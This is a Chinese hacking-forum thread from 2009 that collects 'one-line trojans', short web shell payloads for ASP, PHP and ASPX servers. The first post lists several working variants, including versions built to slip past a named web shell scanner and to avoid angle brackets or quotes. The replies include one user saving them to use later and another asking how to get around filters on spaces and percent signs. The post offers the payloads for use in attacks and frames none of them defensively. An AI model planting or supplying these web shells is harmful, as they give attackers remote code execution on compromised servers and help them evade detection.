【3.A.S.T】网络安全爱好者 » 专题归类 » 一句话木马的多种形式（经典）

返回列表发帖

3.A.S.T上尉

Rank: 4

帖子: 192
积分: 413
威望: 441
金钱: 328
在线时间: 43 小时

1楼 跳转到 » 倒序看帖

字体大小: tT

发表于 2009-1-7 12:11 | 只看该作者

一句话木马的多种形式（经典）

木马, 形式, 经典

<%eval(request("a")):response.end%>

asp一句话
<%execute(request("1"))%>

php一句话
<?php eval($_POST[1]);?>

aspx一句话
<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>

可以躲过雷客图的一句话。
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>

不用'<,>'的asp一句话
<script language=VBScript runat=server>execute request("1")</script>

不用双引号的一句话。
<%eval request(chr(35))%>

3.A.S.T士兵

Rank: 1

帖子: 24
积分: 24
威望: 24
金钱: 29
在线时间: 0 小时

2楼

发表于 2009-4-10 10:03 | 只看该作者

这个是什么，没看懂，寒:L

3.A.S.T上尉

Rank: 4

帖子: 308
积分: 403
威望: 433
金钱: 356
在线时间: 16 小时

贡献奖灌水王支持奖章

3楼

发表于 2009-7-19 14:13 | 只看该作者

先收起来，以后慢慢学着用。

3.A.S.T少尉

Rank: 2

帖子: 63
积分: 115
威望: 102
金钱: 63
在线时间: 16 小时

4楼

发表于 2009-8-2 12:17 | 只看该作者

asp一句话
<%execute(request("1"))%>
这句不错啊
没有空格
可是我遇到的过滤了空格和%
这个怎么办？？？？？？？？？、